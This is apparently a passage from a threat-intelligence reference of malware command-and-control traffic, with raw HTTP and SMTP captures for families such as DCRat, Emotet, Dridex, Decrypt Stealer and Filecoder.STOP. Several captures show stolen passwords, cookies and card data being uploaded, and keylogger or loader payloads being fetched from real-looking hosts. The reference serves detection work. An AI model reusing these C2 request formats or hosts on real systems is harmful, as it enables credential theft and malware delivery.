Darkcomet\n~~~\nBF7CAB464EFBA57DAD495BECB15D8B4C57F0BE821AEF052DF1C27F08DDFC328EB3FE9F5699707BCDC8C751A55F2CE98F3201C7FC248AA8FC340C2F20D8436FEDEAF457052D53A8F4BFF6568F5D644E03BDB309B022A095BBC95AECE9ACB25EFD2BA04271017BADF1C0D75325C58BB1A8E3C42814BA1D830DF380472AFFBC7F034344A76764BFCC2DC473B6836F4CF2D8518E9CA4A32A3C5FA402FA2837A9BEE006127A5E073F925EC3F95F680D25EB86F58C423E5C645340002B677EA40FE1648BAE9D11EA4BC915D6E53CEF98429542C22BD7439A33FFE8B48BE44AD038C62AA82985A15A0F7F9E342D9F81EB0DB396D2589D80F51FEE9B296FCCE117FCCC25EB8445EFE7617E0930C3FC1931227EC1E2AC401B18E0AE61924E7402CFBB418711F39C890EB6AAD843903AE1D39A0DF31AFFDECA82F3FA48EB19D122088C809D5CEA3F4C59E8C8D57AB04B3DFDE3DD47B37878AD856643B46CAD5A4DEBC3E677BA446EBAD350549BB36FC8FAAE784C7C1EC91932AEB6A3014F3C11FDB9EBA711B7517E0C4EEFA15FF93BDBE8D0E716D8C7E5F3\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/darkcomet.png \"Darkcomet\")\n\n#### Darkrat\n~~~\nPOST /request HTTP/1.1\nAccept: text/plain\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: agent\nHost: 104.244.75.179\nContent-Length: 640\n\nrequest=YUhkcFpEMDVNREExT1dNek55MHhNekl3TFRReFlUUXRZalU0WkMweVlqYzFZVGs0TlRCa01tWW1ZMjl0Y0hWMFpYSnVZVzFsUFZWVFJWSXRVRU1tWVc5eWJtOTBQV1poYkhObEptbHVjM1JoYkd4bFpGSmhiVDB6TGpRNU9UWXhPU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDEwY25WbEptRnVkR2wyYVhKMWN6MG1ZbTkwZG1WeWMybHZiajB5TGpJdU1DWm5jSFZPWVcxbFBXUkhPV3RpZHowOUptTndkVTVoYldVOVUxYzFNRnBYZDI5VmFXdG5VVEk1ZVZwVGFGVlVVMnRuWVZSVmRFNXFVWGROUTBKRVZVWlZaMUZEUVhsTWFtTjNVakJvTmlaaGNtTm9QV1ZFWnpJbWIzQmxjbWx1WjNONWMzUmxiVDFXTW14MVdrYzVNMk41UVROSlJrNXNZMjVhY0ZreVZXZFZSMFpxWVhsQmVDWnpjSEpsWVdSMFlXYzljR0ZzYVhkaA==\n\nHTTP/1.1 200 OK\nDate: Tue, 08 Oct 2019 11:25:25 GMT\nServer: Apache/2.4.25 (Debian)\nSet-Cookie: PHPSESSID=hikrbr50pt7ggjr4rcbg40bvl6; path=/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nContent-Length: 0\nContent-Type: text/html; charset=UTF-8\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/darkrat.png \"Darkrat\")\n\n#### DCRat\n~~~\nGET /ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/56743785cf97084d3a49a8bf0956f2c744a4a3e0.php?data=active\n\nHTTP/1.1\nHost: domalo.online\nConnection: Keep-Alive\n\nGET /ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w/212bad81b4208a2b412dfca05f1d9fa7.php?type=__ds_setdata&__ds_setdata_user=552b13e67562d7b564b8a0ac9f35c735d17c786b&__ds_setdata_ext=2dce65292845e5dbc41d772bf7f1866e&__ds_setdata_data=%3CSTR%3Esmss.exe%3CSTR%3Esvchost.exe%3CSTR%3Ewinlogon.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Ecsrss.exe%3CSTR%3Esvchost.exe%3CSTR%3Elsm.exe%3CSTR%3Eqemu-ga.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Eexplorer.exe%3CSTR%3ESearchProtocolHost.exe%3CSTR%3Elsass.exe%3CSTR%3Ectfmon.exe%3CSTR%3Edwm.exe%3CSTR%3Ecsrss.exe%3CSTR%3Esvchost.exe%3CSTR%3Eservices.exe%3CSTR%3EWmiPrvSE.exe%3CSTR%3Ewininit.exe%3CSTR%3Espoolsv.exe%3CSTR%3Efsdffc.exe%3CSTR%3ESearchIndexer.exe%3CSTR%3ESearchFilterHost.exe%3CSTR%3Ewindanr.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Etaskeng.exe%3CSTR%3ESystem.exe%3CSTR%3Esvchost.exe%3CSTR%3EIdle.exe \n\nHTTP/1.1\nHost: domalo.online\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dcrat.png \"DCRat\")\n\n#### Decrypt Stealer\n~~~\nPOST /gate.php HTTP/1.1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccepts-Language: en-us,en;q=0.5\nContent-Type: multipart/form-data; boundary=---------------------------8d7f030923bcd86\nHost: geroipanel.site\nContent-Length: 1282596\nExpect: 100-continue\nConnection: Keep-Alive\n\n-----------------------------8d7f030923bcd86\nContent-Disposition: form-data; name=\"platform\"\n\n0\n-----------------------------8d7f030923bcd86\nContent-Disposition: form-data; name=\"profile\"\n\n0\n-----------------------------8d7f030923bcd86\nContent-Disposition: form-data; name=\"cccount\"\n\n0\n-----------------------------8d7f030923bcd86\nContent-Disposition: form-data; name=\"fcount\"\n\n0\n-----------------------------8d7f030923bcd86\nContent-Disposition: form-data; name=\"ccount\"\n\n0\n-----------------------------8d7f030923bcd86\nContent-Disposition: form-data; name=\"logs\"; filename=\"bVYyP5uHP5ea.zip\"\nContent-Type: zip\n\nPK.........l.P................Desktop Files\\PK.........l.P............\n...Passwords.txtPK.........l.P............0...Browsers\\AutoFill\\Unknown_Microsoft_Autofill.txtPK.........l.P............1...Browsers\\Cards\\Unknown_Microsoft_Credit_Cards.txtPK.........l.P............2...Browsers\\Cookies\\Default_Google_Chrome_Cookies.txtPK.........l.P............5...Browsers\\Cookies\\qldyz51w.default_Firefox_Cookies.txtPK.........l.Pz7q)............Browsers\\Cookies\\Unknown_Microsoft_Cookies.txt..1..0....\t..........bA.Q....4.)....t.!.-..1.^.e..\n{....E..%Q..G.P.F...t)...z.. Mp{.%C..........6...!.L....<...........F.>W.PD...07....>.T_@..........PK.........l.P\t^..~...C...4...Browsers\\Cookies\\Unknown_Steam_htmlcache_Cookies.txt..A\n.0.E...J.I.8..[. .N..8%.(xz........{<-....1..p...H2.8)....YD.w. ..92.,.r.{.........L..?...aP./O..;@.(N.X.!.....5...\\...v?.PK........2.)M..*.....>.......FileZilla\\filezilla.xml.Yko.:......?..I...E..4Iw...........D[l(R.);.....%9N....v,\n\n...Skype\\CURRENT.u..ts\n..5..C..PK.........p.M............\n...Skype\\LOCKPK.........~)Ma...d.......\t...Skype\\LOG320..7..\"]CS+S ..3.4P022.P.J--..KW.u..ts\n.Q.I-K.II..\t....!..VS.a.$........OWP64.............`...@B\\.PK.........w.M`.6.........\n...Skype\\LOG.old.._K.0....)..Qko.$............v.1..h.....vC$+..-..;..pdI.I.a...RG..s.L..l...Ij..:JN...4....PK.........v.M........5.......Skype\\MANIFEST-000001.Z.....#.TNjYjNJ..SeIjyfq.s~nAbQbI~...3......9!..L,...l,..L./..D|]C...2sR........ .*..X.]Y.Z..X\\.XP..X...........Z....\n...H...h4..hN..........Q).nt0....\n......2..h....;...\th&..7.A.\"......$>.I. .x.o@3I.......[..2I.h....;....h&..p..D>?...&.I.,Z..............A..Q.=zX...aZ.\n.PK...........l.P..............................Desktop Files\\PK...........l.P............\n.............,...Passwords.txtPK...........l.P............0.............W...Browsers\\AutoFill\\Unknown_Microsoft_Autofill.txtPK...........l.P............1.................Browsers\\Cards\\Unknown_Microsoft_Credit_Cards.txtPK...........l.P............2.................Browsers\\Cookies\\Default_Google_Chrome_Cookies.txtPK...........l.P............5.............D...Browsers\\Cookies\\qldyz51w.default_Firefox_Cookies.txtPK...........l.Pz7q)..........................Browsers\\Cookies\\Unknown_Microsoft_Cookies.txtPK...........l.P\t^..~...C...4.............y...Browsers\\Cookies\\Unknown_Steam_htmlcache_Cookies.txtPK..........2.)M..*.....>.................I...FileZilla\\filezilla.xmlPK..........1.)M..p.L.....................N...FileZilla\\layout.xmlPK...........l.P...E_6..j.....................Images\\Screenshot.pngPK...........l.P..........................^C..Images\\Webcam.pngPK...........l.Pr..........................C..OutLook\\OutLook.txtPK...........q.M!$...r..i..................C..Skype\\000005.ldbPK............)MpCM..[........................Skype\\000017.logPK...........v.M.i...s..o.................1...Skype\\000018.ldbPK...........p.M.r..........\n............. ...Skype\\CURRENTPK...........p.M............\n.............Z...Skype\\LOCKPK...........~)Ma...d.......\t.................Skype\\LOGPK...........w.M`.6.........\n.............\n...Skype\\LOG.oldPK...........v.M........5.................=...Skype\\MANIFEST-000001PK....................\n-----------------------------8d7f030923bcd86--\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/decryptstealer1.png \"Decrypt Stealer\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/decryptstealer2.png \"Decrypt Stealer\")\n\n#### Delf Loader\n~~~\nGET /gate.php?serial=MTc4NS02NDU5LTQ2NDktMjQ0NA== HTTP/1.1\nContent-Type: text/html\nUser-Agent: License\nHost: ddhook.000webhostapp.com\nCache-Control: no-cache\n\nHTTP/1.1 200 OK\nDate: Mon, 07 Oct 2019 10:36:45 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nServer: awex\nX-Xss-Protection: 1; mode=block\nX-Content-Type-Options: nosniff\nX-Request-ID: db10cf7bfe6a5d2a490182a808ccb458\n\n11d091d035fb3bd27625c54c622a7e48\n\n\nGET /check.php?serial=MTc4NS02NDU5LTQ2NDktMjQ0NA== HTTP/1.1\nContent-Type: text/html\nUser-Agent: License\nHost: ddhook.000webhostapp.com\nCache-Control: no-cache\n\nHTTP/1.1 200 OK\nDate: Mon, 07 Oct 2019 10:36:45 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nServer: awex\nX-Xss-Protection: 1; mode=block\nX-Content-Type-Options: nosniff\nX-Request-ID: 4f25a2a515ae727693adbe820cf36edd\n\nbff12793b8731a7f138e454a576ed1b5\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/delf.png \"Delf Loader\")\n\n#### Diamondfox\n~~~\nGET /plugins/keylogger.p HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: exploit.rocks\nConnection: Keep-Alive\n\nI..Dw..o.............?.\"..zoh:.X4.O..CCUT:WV.HF7#.h......zE...:oj'vV..>X\n..O..&?.x..a.s.l.A1....D.... loU....G^......l.:.....u.......8..Lq[..N`.]...n..Qy...Q.nn.........}eF.C...;N9.lI@P.f.}g.....V~.lf>)...T..@.(..c-V..yOOe.....6.L/.D...~...p.\n\nGET /plugins/ftp.p HTTP/1.1\nUser-Agent: vb wininet\nHost: exploit.rocks\n\nHTTP/1.1 200 OK\nDate: Mon, 22 Apr 2019 19:53:57 GMT\nServer: Apache\nLast-Modified: Sun, 19 Jul 2015 09:20:08 GMT\nETag: \"15e0360-4000-51b36ed5c8200\"\nAccept-Ranges: bytes\nContent-Length: 16384\nVary: Accept-Encoding,User-Agent\nContent-Type: text/x-pascal\n\n..)..7C4J=K9..H;.#W R!W%.*\\/]/[,f.c.a.`.i.o.j.o.u.t.u.s.~\n{\t..x..l.~....,.\n3.^_...3.c\tw.x.?.{.q.QrF2.%V:.4Eym.{{\\,S%.L:O.JO;J>..........................................................................................................................rrrrw.3G6B6@5AJ>H=I$P V'S\"V*\\)](\\7C4N=K9I>H;Q#W R!W%]*\\/]/[,f.c.a.`.i.o.j.o.u.t.u.s.~\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/diamondfox.png \"Diamondfox\")\n\n#### Dodgerblue\n~~~\nMAIL FROM: \n250 OK\nRCPT TO: \n250 Accepted\nDATA\n354 Enter message, ending with \".\" on a line by itself\nthread-index: AdeYjY9JWfNpH2aQRTCt4pdvmqBa0w==\nThread-Topic: Passwords:::JOHNS-PC\\cep2solilJZGK\nFrom: \"abadia firmhearted\" \nTo: \nSubject: Passwords:::JOHNS-PC\\cep2solilJZGK\nDate: Mon, 23 Aug 2021 19:13:00 -0700\nMessage-ID: <870B54DC128A4D2CADAF814D7EBD6F47@SXQUR6787287963>\nMIME-Version: 1.0\nContent-Type: multipart/mixed;\n\tboundary=\"----=_NextPart_000_0000_01D79852.E3EBF170\"\nX-Mailer: Microsoft CDO for Windows 2000\nContent-Class: urn:content-classes:message\nImportance: normal\nPriority: normal\nX-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17514\n\nThis is a multi-part message in MIME format.\n\n------=_NextPart_000_0000_01D79852.E3EBF170\nContent-Type: text/plain\nContent-Transfer-Encoding: 7bit\n\nDate: 2021-08-23 7:12:48 PM\nSystem: Microsoft Windows NT 6.1.7601 Service Pack 1 (64 Bit)\nUsername: cep2solilJZGK\nCompName: SXQUR6787287963\nWindows Version: Microsoft Windows 7 Professional - 64-bit\nAntivirus: Not installed\nCPU: Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz\nGPU: Standard VGA Graphics Adapter\nRAM: 2004MB\nInternal IP: 192.168.180.141\nExternal IP: 104.244.72.168\n\nDate: 2021-08-23 7:12:49 PM\nSystem: Microsoft Windows NT 6.1.7601 Service Pack 1 (64 Bit)\nUsername: cep2solilJZGK\nCompName: SXQUR6787287963\nWindows Version: Microsoft Windows 7 Professional - 64-bit\nAntivirus: Not installed\nCPU: Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz\nGPU: Standard VGA Graphics Adapter\nRAM: 2004MB\nInternal IP: 192.168.180.141\nExternal IP: 104.244.72.168\n\n\n------=_NextPart_000_0000_01D79852.E3EBF170\nContent-Type: text/plain;\n\tname=\"credentials.txt\"\nContent-Transfer-Encoding: 7bit\nContent-Disposition: attachment;\n\tfilename=\"credentials.txt\"\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dodgerblue.png \"DodgerBlue\")\n\n#### Donotgroup\n~~~\nPOST /ze/volad/uzi HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\nHost: skillsnew.top\nContent-Length: 1265\nCache-Control: no-cache\n\ndata=oowJkdfLibIHB1Y62ffb2Cf5imwjN2x/vp1AE/SF8E9/fX1cnZaC6Bg7jRETqi6iAsAVATepyhSETB+r2H2rYWEvvx/SmugiXvz27uz0yReYJAkt5CqsQ1ydb5UHNRcWeCnGPQpjtxUSdy2LbDj+BHjBdjchVAB23Cz4rjuoSeMKlJRQ9zvCOr97/MMALs/TboDUd+5fj/i2/APrZTfpizOy8v+poMBVcVMSRXHmpqpemivoTJEMmTx7y5tGBeY2YbMpVycCDNMyaJr7Xuh3Bng2MVZ5/OO2jvfqFXqwiMMZtiBEpRGjCKGYsUb/J2cyOMtemC3Sh71GkfSpI1sSV+1rKJzBILo6VHTGPK0Z12dxKVXEUCn4KTUTo/QVWTCnCyL7r+b0BIL+SVXjBOGtamQqja1Hq0Hrihoulr6qYy0jDKiyDa9n9BkSO3AJXsx5IkMf0qQvKzMW3iWvcRmILL1AXRCGgsxFCvAcDZ9GV5jM7E6rXEYQcYATyePeWJIMnNO6Tvyn/4qcywkEiKwt8Uoe6YCGaEwZjIsWfhFHTyJXj4KUY7nUuArbF1iz029U2QErLL5AiQUpHYeddGkjkvEPRnwahESDpYAwS6dVEKCn/n4CMJHEJqxHNRA2uSEewoCBYQb1lsKfdiMFZvD1kzKaxR7Oeluch5UFAGEhbJQMC6PsyVQ1nna6bn2S/0Bc4tKsMXfkr3YdfrPrXjUu4PlMRYPQYFUKTTpsFyAHXQ4a5jaiW9PmZOx1Iej9I0aFIiF8e1nVYgNXmMO3pYYbKxW0sn/MswbPNeNs3vQVFma15AM3y7eK8sPPizvYTsG6ld8rW0aUNqidEfpvck50hpUDKH0RdcfT9u+Kw5NZJ99ebBO8DMc1q4/8l9Tb887feKC1bvRVS2JYZKSyDaLJtC7VYZLjtczdqtu5Ayrh3q8kvWFxneIVI9jBuYi5YSkH+F7YQ/yuiDZwtGw6USUejEOuIpfa0PSIJQkDf01AqeKrXcNtKnmjv51Kmu1Go5u0v/zPgWDNG6w3DH0UhWrZxodJwLuKx6Qu66p3Vww/XJcQwVIK+86StKqMcCBH44nE11jRVZNi8L5Ru6WWvVqtktYlOJAJq9T/0Y3O7Onac3fDTThRSkme8mpvzCbkVhTW3jG9h+8aKt2H5rpgrb+4oSfCZQh+V+zDE54I2ODNytc79YOHTdrxYgEG3K2wS4udvyG6t66FA8RUJqmMc+ZPSGk9ZDH0hKpA5iWAr06IGlo=\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/donotgroup.png \"Donotgroup\")\n\n#### Dridex (loader)\n~~~\nGET /function.php?3b3988df-c05b-4fca-93cc-8f82af0e3d2b HTTP/1.1\nHost: masteronare.com\nConnection: Keep-Alive\n\nHTTP/1.1 200 OK\nServer: nginx\nDate: Tue, 05 Nov 2019 20:32:12 GMT\nContent-Type: application/octet-stream\nContent-Length: 455830\nConnection: keep-alive\nKeep-Alive: timeout=60\nAccept-Ranges: bytes\nContent-Disposition: attachment; filename=5dc1dc4cd884c.pdf\n\n7Y2FGZnZ2enZ2dnZydnZ2dhgYD3Z2e1B2dnZ2dnZ2dnZmdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnYPdnZ2dnYDUUJQA3ZDdll5flVQdWN6B19hcF9HVE51QFRaDllUWnFDfnB5X1VaAkFTdHVebWR1TlNgA1BWYANQZXIOY35wBkFtcGJCc2YHfH12dnZ2dnZ2dnZ1XxxRchx9bV5RVWRgblkFB1tafQ5DdlsAXlVjBW5ZBQd0b0FxQ3J9XlFVZn1SD1oFQ1p9DkMCR1F0VWRGblkFB1tafQJDX31eUVVmfVIAYAdcWn0OQ3ZbAFtVZGRuWQUHdG9CeUN9fV5RVWZ9UgIFB1xafQ5DYlpbXVZ0YG5ZBQd2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZicmJ2dnJAdXV2dXJRenFTdnZ2dnZ2dnZ2dnNQdnZ+X3RAcn52dnRAdkB2dlh9cn\n~~~\n~~~\nPOST / HTTP/1.1\nHost: 194.99.22.193\nContent-Length: 3442\nConnection: Close\nCache-Control: no-cache\n\n..5......[,h?])moo..;.Y..\nv..jq..........G.0vR...@ ..6tw..<.{It.y\n#l.K..8....v...v......=.+.......Q..v..P5...y...uhTqR.\n..v.QoM..o.I.l...>.....p.....Rt...............\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dridex.png \"Dridex\")\n\n#### Dunihi\n~~~\nPOST /is-ready HTTP/1.1\nAccept: */*\nAccept-Language: en-us\nUser-Agent: C4BA3647<|>USER-PC<|>admin<|>Microsoft Windows 7 Professional <|>+<|>undefined<|>false - 20/9/2019\nAccept-Encoding: gzip, deflate\nHost: 192.186.145.93:8885\nContent-Length: 0\nConnection: Keep-Alive\nCache-Control: no-cache\n\nHTTP/1.1 200 OK\nConnection: close\nContent-Type: text/html\nServer: Indy/9.0.18\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dunihi.png \"Dunihi\")\n\n#### Emotet\n~~~\nPOST /mult/tlb/ HTTP/1.1\nReferer: http://69.162.169.173/mult/tlb/\nContent-Type: application/x-www-form-urlencoded\nDNT: 1\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: 69.162.169.173:8080\nContent-Length: 468\nConnection: Keep-Alive\nCache-Control: no-cache\n\n5Grps=L1sIwg4a7XWGwPpN9LOBzMiBXsZTP33ixo%2FUspmgBLoaYr0K7KnwvoUER9%2B5NzIxpTHgpSTeVRZMm92wSA%2Ff9pG66uhR%2FX%2BGREn%2BVIvlr3LiYQupDVsdexmgD%2FSXdTJ%2FxXNSo5Q52S4HvI9eLtM9s0arCw%2FNNEZlkzp6e8omxU3854YNNNUcAV54N30rgISrXlxvWJz9TP%2FelEcMxMf3hzv91K1Uz8H2KWzWjV2x78pmAG9HGdkFGLaOq6Tqp1LH6Uc7c1gzmZ3Cht2T4cKg06DPDTHkXYj%2F7uCMWAFMO%2FS4QlZl1XKi8MmZck0JAmxsZdGcmIkQoqq5DzFCio6fUAgvqUN3g1%2BP5eXYeZpGu1xIzbWLRG9Wtt2vUOjz4ezl6Z%2B2peN1LKWN%2F8V0CLjxQHhXSu9YZP4g3NIdJ5qofLmM0ipT\n\nHTTP/1.1 200 OK\nServer: nginx\nDate: Mon, 07 Oct 2019 13:38:33 GMT\nContent-Type: text/html; charset=UTF-8\nContent-Length: 148\nConnection: keep-alive\n\n.^ta.I..Z .._AJ*..=._...5-...F.L{>...`.c.....~.|.h...@.E...2.Z|U..W..M....b......X.FA....x.....\\.j?/C......{pi.b....Cz......>D..yQ........G.q...4?..\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/emotet-1.png \"Emotet\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/emotet-2.png \"Emotet\")\n\n#### EngrWiz\n~~~\nPOST /b.php?79 HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nHost: litespidchk.tk\nContent-Length: 970\nExpect: 100-continue\n\nmain1=bNzJOjMPRRDJ2ylFA1SCAY7GEg0j4ROaetEMhuN1ObuzyJ%2bYF2etM938iapA5dT909gUM9ORgU5n0fMY%2fFKhRr7QWxNopqIoNFeQWjzRaqyGtXxs5NLSLHAitCOyzowy&back=TnpNNU5DMUJNamRETFRnMk9VVXRRVEpEUXkwM016WXpMVE00TXprdFFqTXlNaTA0TXpCRE96VHA%3d&main3=NTQ%3d&main2=Gr4YoYDefbNT%2ftg2inQcbufFo%2bzbKZmaqrttK%2fVrQXhuPh9fr66Kem9y7I%2bsUHvrnrmSNogQl3Lk%2bMvr9p8aGKsZrSODSSTbYPy3Osy5WF8reN7lc6V%2fUtARI%2bizcbulBVnqc3zLaKOvIEl8eDqq6mbY5GwzG3Mie6NW5W1zLG3hEmABLyZkbQdJhhkYhMpQbxkuIhbcIzdTSm9%2b4xC8gb9v%2bnRligpWZowXrb56VqPC9KrPYuBnIqHH4xj5Pwgyl1g8kDTLJ2qMfGIAZeFv4YuSM2Xuza%2bMN7Zpi8Uuxuvq1D9wsc7b8V4POHZ9Rn34alELER2wAdRQ7PiNI2sglwH97JsZoopUyW28YJOAFWJ6kDPKXKIpiUifcye%2b4wplt9fV3OycDqbt5gAbobpA7qNTgyQfAUXYrXMDRNhNQi4%2ffbWCt2%2fd%2bZd%2fxe9k55wQhhLbdy%2bn1wLkZz4NIGssu9vJECynDGwT%2f4MlFIwD5kV0hD%2bjjSTHecWF23%2f0Wi%2fCS7msiLCQ3SukIpWskjRPNPZ8TDvlYctblEeLUZWZDobBQgsdLUzCekYEsX4toOXF2NV69a3ayO0e8etiw4LPRrvbBQiAmU5FZYESOeWkaw71mxzjOxeHFPQtKn2%2fWwdxBpl05y5BtZSnOzfc2wCELk4iYCl20OE5OtjyGvhtAes%3dHTTP/1.1 200 OK\nDate: Wed, 24 Jul 2019 09:11:10 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nSet-Cookie: __cfduid=d6917d65789c5d5e772089d4fe53cd4181563959469; expires=Thu, 23-Jul-20 09:11:09 GMT; path=/; domain=.litespidchk.tk; HttpOnly\nX-Xss-Protection: 1; mode=block\nX-Content-Type-Options: nosniff\nX-Request-ID: 571e4da59d69406a9d967ee31ad5fae4\nServer: cloudflare\nCF-RAY: 4fb4c3dd683ccaf4-ARN\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/engrwiz.png \"EngrWiz\")\n\n#### Evilpony\nFollow tcp stream, not http stream in wireshark\n~~~\nPOST /d2/about.php HTTP/1.0\nHost: spausence.com\nAccept-Encoding: identity, *;q=0\nAccept-Language: en-US\nContent-Length: 337\nContent-Type: application/octet-stream\nConnection: close\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nContent-Encoding: binary\n\n...Q..8.T.f5...~....I..%..`qq...q.^.i.u..v.|34.../t....w....u.}........\n6.......\n...2..T(.Z.X/..A....55.....>$l\n..uE.-..p..\n..omvs.S.uYa.Y...............Ezv...B.OM_.X.pg..1...6..}kN..U..%...2.:.H.E......9.k.-.5sD..@.*\n\tk~........y.s.....@.L+X....wK.O11a.q.$.zd.A...hd9........,. ..(..tP..$.|rS....I.8\"\n..X!@.\t....4N...x.<.......!m~O_.T`.HTTP/1.1 200 OK\nServer: nginx/1.10.3\nDate: Thu, 03 Oct 2019 17:18:05 GMT\nContent-Type: text/html\nConnection: close\nX-Powered-By: PHP/5.4.45\n\nI6.$...Z,.... \n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/evilpony.png \"Evilpony\")\n\n#### Evrial Stealer\n~~~\nHTTP/1.1 100 Continue\n\nPOST /files/upload.php?user=XakFor.Net&hwid=EEEB5D54788042A7B542739BBC26CF4B HTTP/1.1\nContent-Type: multipart/form-data; boundary=---------------------8d7830f073b0ab4\nHost: softfare.zzz.com.ua\nContent-Length: 58292\nExpect: 100-continue\nConnection: Keep-Alive\n\n-----------------------8d7830f073b0ab4\nContent-Disposition: form-data; name=\"file\"; filename=\"sega2laj1y4.zip\"\nContent-Type: application/octet-stream\n\nPK........W..O........M.......desktop.jpg..u\\T].=:.4b. ....t.\"14CI..AH..H( #9t#0.. ) \n.!.J7.\n...}.}.....?.....9s....a?.Y.z.yO..L...*!.`xxx.{.?..(L.FBDDLt.................\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/evrial.png \"Evrial\")\n\n#### Exilerat\n~~~\nPOST /test/u HTTP/1.1\nCache-Control: no-store\nConnection: Keep-Alive\nPragma: no-store\nContent-Type: multipart/form-data; boundary=--71h2ll4i66hhbl\nAccept: text/*,application/*\nAccept-Language: en-US,en\nHost: 27.126.188.212\nContent-Length: 368\n\n--71h2ll4i66hhbl\nContent-Disposition:form-data;name=\"x.bin\"\nContent-Type:application/octect-stream\n\ncjESYTqBEdGqEeIxETEREaKiooqikgm6irKKgqKigimigikRMysrKz8jIyMrqhHi\nMRExERGioqKKopIJuoqyioKiooIpooIpETMbIyMjibkJsUqhOTsLIyMjKABIaFAD\nGyMjI6JSolKiUqIL2yMjI4qySoqCSqKiSoIpSqKCSikRquqyUqqS4lKqoqJS4qob\nkyMjI5loUABYmLgimiKQCLDyklKqUpqSoqpjBAMjIw==\n--71h2ll4i66hhbl--\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/exilerat.png \"Exilerat\")\n\n#### Expiro\n~~~\nPOST dovamnabihede.ws HTTP/1.1\nUser-Agent: Mozilla/4.0 (Compatible; msie 44; NT6.1.7601-90376708.ENU.3DA43F52-83C788-FF5FFC-15DD1711; .NET CLR 00000000/00000000)\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/expiro.png \"Expiro\")\n\n#### Filecoder.STOP\n~~~\nGET /As73yhsyU34578hxxx/SDf565g/get.php?pid=2485E9F082250E269EA0EF635E0D382D&first=true HTTP/1.1\nUser-Agent: Microsoft Internet Explorer\nHost: ring1.ug\n\nHTTP/1.1 200 OK\nDate: Fri, 25 Oct 2019 13:26:11 GMT\nServer: Apache/2.4.37 (Win64) PHP/5.6.40\nX-Powered-By: PHP/5.6.40\nContent-Length: 562\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\n{\"public_key\":\"-----BEGIN PUBLIC 